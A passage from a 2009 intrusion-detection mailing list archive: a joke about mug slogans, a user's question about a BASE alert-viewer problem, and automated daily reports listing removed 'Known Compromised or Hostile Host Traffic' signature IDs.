most: >> >> Serious mug (in upper case with all three lines no taller than height of logo): >> [Logo] >> DEFENDING NETWORKS >> AGAINST ALL ENEMIES >> FOREIGN AND DOMESTIC >> >> >> Humorous mug: >> [Logo] >> content: "|C0 FF EE| >> >> >> > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From kevross33 at googlemail.com Fri Aug 7 08:53:37 2009 From: kevross33 at googlemail.com (Kevin Ross) Date: Fri, 7 Aug 2009 13:53:37 +0100 Subject: [Emerging-Sigs] BASE Help -Weird Issue Message-ID: Ok with BASE on one of my sensors I was playing with the Cache and status page and pressed clear cache. Now as in screenshot.png alerts are appearing in the cache but no alerts are showing on the alerts page. I can connect with other tools to the database such as snortsam, Biik, Livesnort etc and see the alerts. However even remotely I cannot get access with base, I have dropped the database and base and reinstalled everyting but it still occurs. Any ideas what I have done? -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090807/46a77e06/attachment-0001.html -------------- next part -------------- A non-text attachment was scrubbed... Name: Screenshot.png Type: image/png Size: 227162 bytes Desc: not available Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090807/46a77e06/Screenshot-0001.png -------------- next part -------------- A non-text attachment was scrubbed... Name: Screenshot-1.png Type: image/png Size: 228009 bytes Desc: not available Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090807/46a77e06/Screenshot-1-0001.png From emerging at emergingthreats.net Fri Aug 7 16:00:12 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Fri, 7 Aug 2009 16:00:12 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20090807200012.954D14504A@goliath.jonkmans.com> [***] Results from Oinkmaster started Fri Aug 7 16:00:12 2009 [***] [*] Rules modifications: [*] None. [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (72): 2500194 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500195 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500196 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500197 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500198 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500199 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500200 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500201 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500202 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500203 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500204 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500205 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500206 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500207 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500208 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500209 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500210 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510194 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510195 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510196 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510197 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510198 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510199 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510200 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510201 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510202 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510203 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510204 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510205 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510206 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510207 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510208 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510209 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510210 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (72): 2500194 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500195 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500196 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500197 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500198 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500199 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500200 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500201 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500202 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500203 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500204 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500205 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500206 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500207 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500208 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500209 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500210 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510194 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510195 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510196 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510197 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510198 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510199 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510200 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510201 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510202 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510203 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510204 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510205 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510206 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510207 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510208 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510209 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510210 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From emerging at emergingthreats.net Sat Aug 8 16:00:12 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Sat, 8 Aug 2009 16:00:12 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20090808200012.646A84504A@goliath.jonkmans.com> [***] Results from Oinkmaster started Sat Aug 8 16:00:12 2009 [***] [*] Rules modifications: [*] None. [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (48): 2500170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (95) || 